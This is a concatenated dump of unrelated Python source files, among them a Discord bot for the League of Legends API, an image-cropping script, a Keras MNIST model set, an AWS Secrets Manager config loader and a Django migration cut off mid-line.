try:\n result = baseriotapi.get_recent_games(summonerId);\n result = result.to_json()\n message = self.server.addRecord(result)\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n # use freetoplay to see free2pla champs, champion to see one champ and nothing to see all\n @commands.command(pass_context=True, help=\"Returns data from the champion-v1.2 endpoint. Valid values for championOrFreeToPlay are freetoplay, champion and nothing. If champion is specified the data for the default champion is returned.\")\n async def champion(self, ctx, championOrFreeToPlay: str=None):\n if championOrFreeToPlay is not None:\n championOrFreeToPlay = championOrFreeToPlay.lower()\n\n if championOrFreeToPlay is None:\n withChampionId = False\n freeToPlay = False\n elif championOrFreeToPlay == \"freetoplay\":\n withChampionId = False\n freeToPlay = True\n elif championOrFreeToPlay == \"champion\":\n withChampionId = True\n freeToPlay = True\n else:\n withChampionId = False\n freeToPlay = False\n\n if withChampionId:\n championId = DefaultIds.CHAMPION\n else:\n championId = None\n\n try:\n result = self._champion(championId, freeToPlay)\n message = self.server.addRecord(result)\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n except NoSuchMethodException:\n message = \"Method Not Found!\"\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n def _champion(self, championId: int=None, freeToPlay: bool=False):\n if championId is None:\n methodName = \"get_champion_statuses\"\n else:\n methodName = \"get_champion_status\"\n method = self._checkForMethod(methodName)\n if championId is None:\n result = method(freeToPlay)\n # same reason as above. we need the dict for json extraction\n result = result.to_json()\n else:\n result = method(championId)\n result = result.to_json()\n return result;\n\n @commands.command(pass_context=True, help=\"Returns the status data from the lol-status-v1.0. If forRegion is true the data for the NA shard is returned. \")\n async def lolstatus(self, ctx, forRegion: bool=False):\n result = None\n try:\n result = self._lolstatus(forRegion)\n message = self.server.addRecord(result)\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n except NoSuchMethodException:\n message = \"Method Not found!\"\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n def _lolstatus(self, forRegion: bool=False):\n if (forRegion):\n # Note: Cassiopeia get_shard is bugged atm\n result = baseriotapi.get_shards()\n else:\n result = baseriotapi.get_shard(DefaultIds.SHARD)\n result = list(map(lambda x: x.__dict__, result))\n result = json.dumps(result, ensure_ascii=False, indent=4)\n return result\n\n # defaults to challenger if invalid value\n @commands.command(pass_context=True, help=\"This command returns the data from league-v2.5 for Challenger RANKED_SOLO_5x5\")\n async def league(self, ctx):\n result = None\n try:\n result = baseriotapi.get_challenger(DefaultIds.QUEUE_TYPE)\n result = result.to_json()\n message = self.server.addRecord(result)\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n except NoSuchMethodException:\n message = \"Method Not found!\"\n\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n @commands.command(pass_context=True, help=\"Returns game data for a default match from the match-v2.2 endpoint. If includeTimeline is true the timeline is included (if returned from the api).\")\n async def match(self, ctx, includeTimeline: bool=False):\n result = None\n try:\n result = baseriotapi.get_match(DefaultIds.MATCH, includeTimeline)\n message = self.server.addRecord(result.to_json())\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n\n isResultNone = result is None;\n await self.sendMessage(ctx, message, isResultNone)\n\n @commands.command(pass_context=True, help=\"Returns data from the matchlist endpoint for the default summoner.\")\n async def matchlist(self, ctx):\n result = None\n try:\n result = baseriotapi.get_match_list(DefaultIds.SUMMONER)\n message = self.server.addRecord(result.to_json())\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n @commands.command(pass_context=True, help=\"Requests ranked data from stats-v1.3 for the default summoner. If showSummary == True the summary is returned instead.\")\n async def stats(self, ctx, showSummary: bool=False):\n result = None\n try:\n if showSummary:\n result = baseriotapi.get_stats(DefaultIds.SUMMONER)\n else:\n result = baseriotapi.get_ranked_stats(DefaultIds.SUMMONER)\n message = self.server.addRecord(result.to_json())\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n # endpoints: None, by-name, masteries, name, runes\n @commands.command(pass_context=True, help=\"This command sends a request to the summoner endpoint. Valid endpoints are by-name, masteries, name, runes and None (leave empty)\")\n async def summoner(self, ctx, endpoint: str=None):\n result = None\n # TODO: Do NOT directly execute this!\n try:\n resultStr = self._summoner(endpoint)\n message = self.server.addRecord(resultStr)\n except APIError as err:\n message = \"HTTP Error: %s\" % err.error_code\n\n isResultNone = result is None\n await self.sendMessage(ctx, message, isResultNone)\n\n def _summoner(self, endpoint: str=None):\n returnStr = None\n if endpoint == \"masteries\":\n result = baseriotapi.get_summoner_masteries(DefaultIds.SUMMONER) # dict\n elif endpoint == \"name\":\n result = baseriotapi.get_summoner_names(DefaultIds.SUMMONER) # dict\n returnStr = json.dumps(result, ensure_ascii=False, indent=4)\n elif endpoint == \"runes\":\n result = baseriotapi.get_summoner_runes(DefaultIds.SUMMONER) # dict\n elif endpoint == \"by-name\":\n result = baseriotapi.get_summoners_by_name(DefaultIds.SUMMONER_NAME) # dict\n else:\n result = baseriotapi.get_summoners_by_id(DefaultIds.SUMMONER) # dict\n\n if returnStr is None:\n returnStr = self._createReturnStr(result)\n return returnStr\n\n def _createReturnStr(self, inputDict):\n returnStr = \"{\";\n for k, v in inputDict.items():\n returnStr += \"\\n\\\"\" + k + \"\\\": \" + v.to_json() + \",\"\n returnStr = returnStr[:-1]\n returnStr += \"\\n}\"\n return returnStr\n\nclass NoSuchMethodException(Exception):\n pass\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\nfrom socketserver import ThreadingMixIn\nimport threading\nimport argparse\nimport cgi\nimport hashlib\nimport random\nimport string\n\n# saves hash & data\nLocalData = {};\n# insert order of the hashes for removal (FIFO)\nInsertList = [];\n\nclass HTTPRequestHandler(BaseHTTPRequestHandler):\n\n def do_GET(self):\n search = re.search(\"%.*%\", self.path)\n if search is not None :\n group0 = search.group(0)[1:-1]\n if group0 in LocalData:\n self.send_response(200)\n self.send_header('Content-Type', 'application/json')\n self.end_headers()\n self.wfile.write(str.encode(LocalData[group0]))\n return\n self.send_response(404, 'Does not exist.')\n self.send_header('Content-Type', 'application/json')\n self.end_headers()\n self.wfile.write(b\"404 - Not Found\")\n\nclass ThreadedHTTPServer(ThreadingMixIn, HTTPServer):\n def shutdown(self):\n self.socket.close()\n HTTPServer.shutdown(self)\n\nclass SimpleHTTPServer():\n def __init__(self, ip, port):\n self.server = ThreadedHTTPServer((ip, port), HTTPRequestHandler)\n\n def start(self):\n self.server_thread = threading.Thread(target=self.server.serve_forever)\n self.server_thread.daemon = True\n self.server_thread.start()\n\n def waitForThread(self):\n self.server_thread.join()\n\n def addRecord(self, data):\n if len(LocalData) > 20: # delete old ones if necessary\n firstHash = InsertList.pop()\n del LocalData[firstHash]\n randStr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))\n LocalData[randStr] = data\n InsertList.append(randStr)\n return randStr\n\n def stop(self):\n self.server.shutdown()\n self.waitForThread()\n","sub_path":"commands/requestapi.py","file_name":"requestapi.py","file_ext":"py","file_size_in_byte":17620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"486516396","text":"\"\"\"author:youngkun;date:20180608;function:裁剪照片的黑边\"\"\"\r\n\r\nimport cv2\r\nimport os\r\nimport datetime\r\n\r\n\r\ndef change_size(read_file):\r\n binary_image = cv2.imread(read_file, 1) # 读取图片 image_name应该是变量\r\n # image=cv2.imread(read_file,1) #读取图片 image_name应该是变量\r\n # img = cv2.medianBlur(img,5) #中值滤波,去除黑色边际中可能含有的噪声干扰\r\n # b=cv2.threshold(img,15,255,cv2.THRESH_BINARY) #调整裁剪效果\r\n binary_image=binary_image[3] #二值图--具有三通道\r\n # binary_image=cv2.cvtColor(binary_image,cv2.COLOR_BGR2GRAY)\r\n print(binary_image.shape) #改为单通道\r\n\r\n # dst = cv2.medianBlur(img, 5)\r\n # binary_image = cv2.adaptiveThreshold(dst, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, \\\r\n # cv2.THRESH_BINARY, 7, 2)\r\n # cv2.imshow(\"bianry_image:\",binary_image)\r\n # cv2.waitKey()\r\n x = binary_image.shape[0]\r\n print(\"高度x=\", x)\r\n y = binary_image.shape[1]\r\n print(\"宽度y=\", y)\r\n edges_x = []\r\n edges_y = []\r\n for i in range(x):\r\n for j in range(y):\r\n if binary_image[i][j]!=255:\r\n edges_x.append(i)\r\n edges_y.append(j)\r\n\r\n left = min(edges_x) # 左边界\r\n right = max(edges_x) # 右边界\r\n width = right - left # 宽度\r\n bottom = min(edges_y) # 底部\r\n top = max(edges_y) # 顶部\r\n height = top - bottom # 高度\r\n\r\n pre1_picture = binary_image[left:left + width, bottom:bottom + height] # 图片截取\r\n return pre1_picture # 返回图片数据\r\n\r\n\r\nsource_path = \"./cut_test/\" # 图片来源路径\r\nsave_path = \"./cut_test/\" # 图片修改后的保存路径\r\n\r\nif not os.path.exists(save_path):\r\n os.mkdir(save_path)\r\n\r\nfile_names = os.listdir(source_path)\r\n\r\nstarttime = datetime.datetime.now()\r\nfor i in range(len(file_names)):\r\n x = change_size(source_path + file_names[i]) # 得到文件名\r\n cv2.imwrite(save_path + file_names[i], x)\r\n print(\"裁剪:\", file_names[i])\r\n print(\"裁剪数量:\", i)\r\n while (i == 2600):\r\n break\r\nprint(\"裁剪完毕\")\r\nendtime = datetime.datetime.now() # 记录结束时间\r\nendtime = (endtime - starttime).seconds\r\nprint(\"裁剪总用时\", endtime)","sub_path":"Eve/black_border.py","file_name":"black_border.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"17537655","text":"import os\nimport logging\nfrom Queue import Queue\n\nfrom raster_processing.job import process_queue\nfrom raster_processing import resample, post_processing\nfrom raster_processing.utilities import file_utilities as file_util\nfrom tiles import run_tilestache, push_to_prod\n\n\nclass Layer(object):\n\n def __init__(self, kwargs):\n logging.debug('Starting layer class')\n\n self.debug = kwargs.debug\n self.threads = kwargs.threads\n self.layer_type = kwargs.layer\n\n self.region_list = kwargs.region\n self.year_list = kwargs.years\n self.world = kwargs.world\n\n self.tiles = kwargs.tiles\n self.is_test = kwargs.test\n self.is_staging = kwargs.staging\n\n self.root_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n self.script_dir = os.path.join(self.root_dir, 'raster_processing', 'utilities')\n\n self.tiles_config_dir = os.path.join(self.root_dir, 'tiles', 'config', self.layer_type)\n self.tiles_output_dir = os.path.join(self.root_dir, 'tiles', 'output', self.layer_type)\n\n self.q = Queue()\n\n def build_job_queue(self):\n \n for region in self.region_list:\n region_dir = os.path.join(self.root_dir, 'data', self.layer_type, region)\n\n self.pre_process(region_dir)\n\n resample.resample_all(self.layer_type, region_dir, self.max_zoom_level, self.q)\n\n post_processing.post_process_all(self.layer_type, region_dir, self.script_dir, self.max_zoom_level, self.q)\n\n if self.tiles:\n\n tile_output_tiles_dir = os.path.join(self.tiles_output_dir, 'tiles')\n file_util.remove_all_files(tile_output_tiles_dir)\n\n run_tilestache.export_tiles(self.layer_type, region_dir, self.tiles_config_dir,\n self.max_world_level + 1, self.max_zoom_level, self.q, self.is_test,\n self.is_staging)\n \n if self.world:\n world_dir = os.path.join(self.root_dir, 'data', self.layer_type, 'world')\n post_processing.build_world_vrts(self.layer_type, world_dir, self.region_list,\n self.max_world_level, self.is_staging, self.q)\n\n if self.world and self.tiles:\n run_tilestache.export_tiles(self.layer_type, world_dir, self.tiles_config_dir, 0,\n self.max_world_level, self.q, self.is_test, self.is_staging)\n\n def process_jobs(self):\n\n process_queue(self.threads, self.q, self.debug)\n\n self.post_process()\n \n def push_to_s3(self):\n\n push_to_prod.push(self.tiles_output_dir, self.layer_type, self.is_test, self.is_staging)\n\n","sub_path":"layers/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225341337","text":"import logging, boto3\nfrom configparser import ConfigParser\nfrom pathlib import Path\nfrom botocore.exceptions import ClientError\n\nROOT_DIR = str(Path(__file__).parent.resolve().parents[0])\nlog = logging.getLogger(__name__)\n\ndef config(filename=ROOT_DIR+'/database.ini', section='postgresql-prod'):\n # create a parser\n parser = ConfigParser()\n db = {}\n\n try:\n # read config file\n with open(filename, 'r') as file:\n parser.read_file(file)\n # get section, default to postgresql\n if parser.has_section(section):\n params = parser.items(section)\n for param in params:\n db[param[0]] = get_secret(param[1])\n else:\n raise Exception('Section {0} not found in the {1} file'.format(section, filename))\n except FileNotFoundError as e:\n log.error(e)\n\n return db\n\nsession = boto3.session.Session()\nclient = session.client(\n service_name='secretsmanager',\n region_name='us-east-1',\n)\n\ndef get_secret(secret_name):\n\n text_secret_data = secret_name\n\n try:\n get_secret_value_response = client.get_secret_value(SecretId=secret_name)\n except ClientError as e:\n if e.response['Error']['Code'] == 'ResourceNotFoundException':\n log.error(\"The requested secret -\" + secret_name + \"- was not found\")\n elif e.response['Error']['Code'] == 'InvalidRequestException':\n log.error(\"The request was invalid due to:\", e)\n elif e.response['Error']['Code'] == 'InvalidParameterException':\n log.error(\"The request had invalid params:\", e)\n elif e.response['Error']['Code'] == 'DecryptionFailure':\n log.error(\"The requested secret can't be decrypted using the provided KMS key:\", e)\n elif e.response['Error']['Code'] == 'InternalServiceError':\n log.error(\"An error occurred on service side:\", e)\n else:\n # Secrets Manager decrypts the secret value using the associated KMS CMK\n # Depending on whether the secret was a string or binary, only one of these fields will be populated\n if 'SecretString' in get_secret_value_response:\n text_secret_data = get_secret_value_response['SecretString']\n else:\n binary_secret_data = get_secret_value_response['SecretBinary']\n \n return text_secret_data\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.ERROR, format='%(asctime)s %(name)s %(levelname)s:%(message)s')\n logger = logging.getLogger(__name__)\n print(config())","sub_path":"user_producer/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"311535784","text":"print('project euler problem 32')\n\nimport copy\n\ndef swap(arr, idx1, idx2):\n arr[idx1], arr[idx2] = arr[idx2], arr[idx1]\n return arr\n\ndef reverseSlice(arr, idx1, idx2):\n sliced = arr[idx1:idx2+1]\n prefix = arr[0:idx1]\n reversedSlice = sliced[::-1]\n return prefix + reversedSlice\n\ndef getNextPermutation(input):\n ret = input[:]\n for pivot in range(len(ret) - 2, -1, -1):\n pivotValue = ret[pivot]\n for i in range(len(ret) - 1, pivot, -1):\n cur = ret[i]\n if pivotValue < cur:\n ret = swap(ret[:], i, pivot)\n ret = reverseSlice(ret[:], pivot + 1, len(ret))\n return ret\n return ret\n\ntestBase = [1,2,3,4,5]\ntestSwap = copy.copy(testBase)\nres = swap(testSwap, 0,4)\ntestReverse = copy.copy(testBase)\nreverseRes = testReverse[::-1]\ntestSlice = testBase[:]\nsliced = testBase[2:4]\njoined = testBase[0:2] + testBase[2:5]\n\ndef getAllPerms(nextPerm): \n allItems = [nextPerm]\n while True:\n prev = nextPerm\n nextPerm = getNextPermutation(nextPerm[:])\n if (prev == nextPerm):\n break\n else: \n allItems.append(nextPerm)\n return allItems\n\nfirstPerm = [1,2,3,4,5,6,7,8,9]\nallPerms = getAllPerms(firstPerm)\n\ndef stringifyAndJoin(arr):\n s = [str(i) for i in arr]\n return int(\"\".join(s))\n\nprint('strngifyandjoin [1,2,3]', stringifyAndJoin([1,2,3]))\n\nsummed = 0\nproducts = set()\nfor x in range(0, len(allPerms)):\n # = [5:10]\n perm = allPerms[x]\n product = stringifyAndJoin(perm[5:10])\n \n # try [0:1]*[1:5]\n operand1 = stringifyAndJoin(perm[0:1])\n operand2 = stringifyAndJoin(perm[1:5])\n triedProduct = operand1 * operand2\n if triedProduct == product:\n print('hit', product, operand1, operand2)\n products.add(product)\n\n # try [0:2] * [2:5]\n operand3 = stringifyAndJoin(perm[0:2])\n operand4 = stringifyAndJoin(perm[2:5])\n triedProduct2 = operand3 * operand4\n if triedProduct2 == product:\n print('hit', triedProduct2, operand3, operand4)\n products.add(product)\n\nfor prod in products:\n summed += prod\n\nprint('all perms has {} items'.format(len(allPerms)))\nprint('summed is ', summed)","sub_path":"src/euler32.py","file_name":"euler32.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"4095607","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom build_dataset import build_dataset\nfrom keras_preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import Input\nfrom tensorflow.keras.layers import MaxPooling2D\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.python.keras.callbacks import LearningRateScheduler\nfrom tensorflow.python.keras.layers import Conv2D, Dense, Dropout, Flatten\nfrom tensorflow.python.keras.models import Sequential\nfrom tensorflow.python.keras.utils.np_utils import to_categorical\n\nx_train, y_train, x_test, y_test = build_dataset()\ny_train = to_categorical(y_train)\nx_train, x_val, y_train, y_val = train_test_split(x_train, y_train, train_size=0.8, test_size=0.2)\n\n# Dense Layers - 1, Activation - softmax\ndef model_1():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n# Dense Layers - 1, Activation - sigmoid\ndef model_2():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(10, activation='sigmoid'))\n\n return model\n\n# Dense Layers - 2, Activation - relu, sigmoid\ndef model_3():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='relu'))\n model.add(Dense(10, activation='sigmoid'))\n\n return model\n\n# Dense Layers - 2, Activation - tanh, sigmoid\ndef model_4():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='tanh'))\n model.add(Dense(10, activation='sigmoid'))\n\n return model\n\n# Dense Layers - 3, Activation - tanh, tanh, sigmoid\ndef model_5():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='tanh'))\n model.add(Dense(15, activation='tanh'))\n model.add(Dense(10, activation='sigmoid'))\n\n return model\n\n# Dense Layers - 3, Activation - tanh, tanh, softmax\ndef model_6():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='tanh'))\n model.add(Dense(10, activation='tanh'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n# Dense Layers - 3, Activation - relu, relu, softmax\ndef model_7():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n# Dense Layers - 3, Activation - relu, relu, softmax\ndef model_8():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(20, activation='relu'))\n model.add(Dense(40, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n# Dense Layers - 3, Activation - relu, relu, softmax\ndef model_9():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(50, activation='relu'))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n# Dense Layers - 3, Activation - relu, relu, softmax\ndef model_10():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(50, activation='relu'))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(200, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n # Dense Layers - 3, Activation - relu, relu, softmax\ndef model_11():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(50, activation='relu'))\n model.add(Dense(100, activation='relu'))\n model.add(Dense(200, activation='relu'))\n model.add(Dense(400, activation='relu'))\n model.add(Dense(10, activation='softmax')) \n\n return model\n\n # Dense Layers - 3, Activation - relu, relu, softmax\ndef model_12():\n\n model = Sequential()\n model.add(Input(shape=(28, 28, 1)))\n model.add(Flatten())\n model.add(Dense(200, activation='relu'))\n model.add(Dense(300, activation='relu'))\n model.add(Dense(300, activation='relu'))\n model.add(Dense(10, activation='softmax'))\n\n return model\n\n\ndef test_model(model):\n y_pred = np.argmax(model.predict(x_test), axis=-1)\n acc = np.sum(y_pred == y_test) / np.size(y_pred)\n return acc\n\n\ndef compile_and_train_model(model, num):\n\n annealer = LearningRateScheduler(lambda x: 1e-3 * 0.9 ** x)\n model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=1e-4), metrics=[\"accuracy\"])\n datagen = ImageDataGenerator(zoom_range=0.1, height_shift_range=0.1, width_shift_range=0.1, rotation_range=10)\n\n hist = model.fit_generator(datagen.flow(x_train, y_train, batch_size=16), steps_per_epoch=500, epochs=15,\n verbose=2, validation_data=(x_val, y_val), callbacks=[annealer])\n\n train_loss, train_acc = model.evaluate(x_val, y_val, verbose=0)\n\n plt.figure()\n plt.plot(hist.history['loss'], color='b', label = 'Loss')\n plt.plot(hist.history['val_loss'], color='r', label = 'Validation Loss')\n plt.xlabel('Epochs')\n plt.ylabel('Loss')\n plt.legend()\n plt.savefig(f'model_loss_{num}.png')\n plt.close()\n\n plt.figure()\n plt.plot(hist.history['accuracy'], color='b', label = 'Accuracy')\n plt.plot(hist.history['val_accuracy'], color='r', label = 'Validation Accuracy')\n plt.xlabel('Epochs')\n plt.ylabel('Accuracy')\n plt.legend()\n plt.savefig(f'model_acc_{num}.png')\n plt.close()\n\n test_acc = test_model(model)\n\n return {'train_acc': train_acc, 'train_loss': train_loss, 'test_acc': test_acc}\n","sub_path":"MNIST Detection Models/keras_models.py","file_name":"keras_models.py","file_ext":"py","file_size_in_byte":5864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"208273662","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom dl_framework.data import load_data\n\n\ndef test_create_h5_dataset():\n data_path = \"./tests/build/gaussian_sources/wo_fourier\"\n fourier = False\n\n test_ds = load_data(data_path, \"test\", fourier=fourier)\n\n img = test_ds[0][0]\n img_y = test_ds[0][1]\n\n assert img[0].shape == (63, 63)\n assert img[1].shape == (63, 63)\n assert img_y.shape == (3969,)\n\n return test_ds\n\n\ndef test_save_predictions():\n num = 3\n\n test_ds = test_create_h5_dataset()\n indices = np.random.randint(0, len(test_ds), size=num)\n\n assert len(indices) == 3\n assert test_ds[0][0].shape[1] == 63\n\n img_size = test_ds[0][0].shape[1]\n\n assert test_ds[0][0].view(1, 2, img_size, img_size).shape == (1, 2, 63, 63)\n assert test_ds[0][0].numpy().reshape(-1).shape == (7938,)\n assert test_ds[0][1].numpy().reshape(-1).shape == (3969,)\n\n test_imgs = [test_ds[0][0].numpy().reshape(-1), test_ds[1][1].numpy().reshape(-1)]\n build = \"tests/build/\"\n if os.path.exists(build) is False:\n os.mkdir(build)\n\n outpath = build + \"input.csv\"\n df = pd.DataFrame(data=test_imgs, index=[1, 2])\n df.to_csv(outpath, index=True)\n\n\ndef test_load_predictions():\n from gaussian_sources.inspection import open_csv\n\n path = \"tests/build/\"\n mode = \"input\"\n test_img, indices = open_csv(path, mode)\n\n assert indices[0] == 1\n assert indices[1] == 2\n assert test_img[0].shape == (7938,)\n assert test_img[1].shape == (7938,)\n","sub_path":"tests/test_visualization/test_save_load_preds.py","file_name":"test_save_load_preds.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"652147208","text":"from Data.parameters import Data\nfrom reuse_func import GetData\n\n\nclass Diksha_page():\n def __init__(self,driver):\n self.driver = driver\n\n def test_navigation(self):\n self.data = GetData()\n count = 0\n self.driver.find_element_by_xpath(Data.hyper_link).click()\n self.data.page_loading(self.driver)\n self.driver.find_element_by_id(Data.home).click()\n self.data.page_loading(self.driver)\n self.data.navigate_to_diksha_content_course()\n self.data.page_loading(self.driver)\n if \"usage-by-course-content\" in self.driver.current_url:\n print(\"Diksha usage-by-textbook-content page is Displayed\")\n else:\n print(\"Diksha usage-by-textbook-content page is not exist \")\n count = count + 1\n self.data.page_loading(self.driver)\n return count\n\n","sub_path":"tests/src/Diksha_Reports/content_course/navigate_to_diskha_report.py","file_name":"navigate_to_diskha_report.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"407913787","text":"from typing import List\n\n\nclass Solution:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n if len(matrix) == 0:\n return []\n ans = []\n level = 0\n m, n = len(matrix), len(matrix[0])\n while level <= min((m - 1) // 2, (n - 1) // 2):\n for i in range(level, n - level):\n ans.append(matrix[level][i])\n for i in range(level + 1, m - level - 1):\n ans.append(matrix[i][n - level - 1])\n if level != m - level - 1:\n for i in range(n - level - 1, level - 1, -1):\n ans.append(matrix[m - level - 1][i])\n if level != n - level - 1:\n for i in range(m - level - 2, level, -1):\n ans.append(matrix[i][level])\n level += 1\n return ans\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.spiralOrder([\n [1, 2, 3],\n [4, 5, 6],\n [7, 8, 9]\n ]))\n print(solution.spiralOrder([\n [1, 2, 3, 4],\n [5, 6, 7, 8],\n [9, 10, 11, 12]\n ]))\n print(solution.spiralOrder([[3], [2]]))\n","sub_path":"pysrc/54.py","file_name":"54.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"263619401","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('materia', '0001_initial'),\n ('parlamentares', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ExpedienteMateria',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data_ordem', models.DateField(verbose_name='Data da Sess\\xe3o')),\n ('observacao', models.TextField(null=True, verbose_name='Ementa', blank=True)),\n ('numero_ordem', models.IntegerField(verbose_name='N\\xba Ordem')),\n ('resultado', models.TextField(null=True, blank=True)),\n ('tipo_votacao', models.IntegerField(verbose_name='Tipo de vota\\xe7\\xe3o', choices=[(1, 'Simb\\xf3lica'), (2, 'Nominal'), (3, 'Secreta')])),\n ('materia', models.ForeignKey(to='materia.MateriaLegislativa')),\n ],\n options={\n 'verbose_name': 'Mat\\xe9ria do Expediente',\n 'verbose_name_plural': 'Mat\\xe9rias do Expediente',\n },\n ),\n migrations.CreateModel(\n name='ExpedienteSessao',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('conteudo', models.TextField(null=True, verbose_name='Conte\\xfado do expediente', blank=True)),\n ],\n options={\n 'verbose_name': 'Expediente de Sess\\xe3o Plenaria',\n 'verbose_name_plural': 'Expedientes de Sess\\xe3o Plenaria',\n },\n ),\n migrations.CreateModel(\n name='IntegranteMesa',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cargo', models.ForeignKey(to='parlamentares.CargoMesa')),\n ('parlamentar', models.ForeignKey(to='parlamentares.Parlamentar')),\n ],\n options={\n 'verbose_name': 'Participa\\xe7\\xe3o em Mesa de Sess\\xe3o Plenaria',\n 'verbose_name_plural': 'Participa\\xe7\\xf5es em Mesas de Sess\\xe3o Plenaria',\n },\n ),\n migrations.CreateModel(\n name='Orador',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('numero_ordem', models.IntegerField(verbose_name='Ordem de pronunciamento')),\n ('url_discurso', models.CharField(max_length=150, null=True, verbose_name='URL V\\xeddeo', blank=True)),\n ('parlamentar', models.ForeignKey(verbose_name='Parlamentar', to='parlamentares.Parlamentar')),\n ],\n options={\n 'verbose_name': 'Orador das Explica\\xe7\\xf5es Pessoais',\n 'verbose_name_plural': 'Oradores das Explica\\xe7\\xf5es Pessoais',\n },\n ),\n migrations.CreateModel(\n name='OradorExpediente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('numero_ordem', models.IntegerField(verbose_name='Ordem de pronunciamento')),\n ('url_discurso', models.CharField(max_length=150, null=True, verbose_name='URL V\\xeddeo', blank=True)),\n ('parlamentar', models.ForeignKey(verbose_name='Parlamentar', to='parlamentares.Parlamentar')),\n ],\n options={\n 'verbose_name': 'Orador do Expediente',\n 'verbose_name_plural': 'Oradores do Expediente',\n },\n ),\n migrations.CreateModel(\n name='OrdemDia',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data_ordem', models.DateField(verbose_name='Data da Sess\\xe3o')),\n ('observacao', models.TextField(null=True, verbose_name='Ementa', blank=True)),\n ('numero_ordem', models.IntegerField(verbose_name='N\\xba Ordem')),\n ('resultado', models.TextField(null=True, blank=True)),\n ('tipo_votacao', models.IntegerField(verbose_name='Tipo de vota\\xe7\\xe3o', choices=[(1, 'Simb\\xf3lica'), (2, 'Nominal'), (3, 